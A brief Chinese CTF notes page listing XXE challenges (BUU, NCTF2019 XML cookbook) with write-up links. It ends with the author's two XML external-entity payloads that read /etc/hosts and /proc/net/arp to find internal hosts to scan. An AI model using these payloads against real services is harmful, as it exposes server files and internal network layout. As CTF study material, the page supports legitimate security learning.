知识

实例

BUU

[PHP]XXE

进来看到

然后一起看
Write

BUU XXE COURSE 1

进来看到

一起看
write

NSS

[NCTF2019]Fake XML cookbook

反正是XXE
直接整
write

[NCTF 2019]True XML cookbook

不整花里胡哨，解题在最下面
write

与博主不同，我通过下面的语句得到了三个地址，其中两个通过c段扫描可以直接出来flag。flag出来了，输入平台却不对

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY abc SYSTEM "file:///etc/hosts">]>
<user><username>&abc;</username><password>123456</password></user>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY abc SYSTEM "file:///proc/net/arp">]>
<user><username>&abc;</username><password>123456</password></user>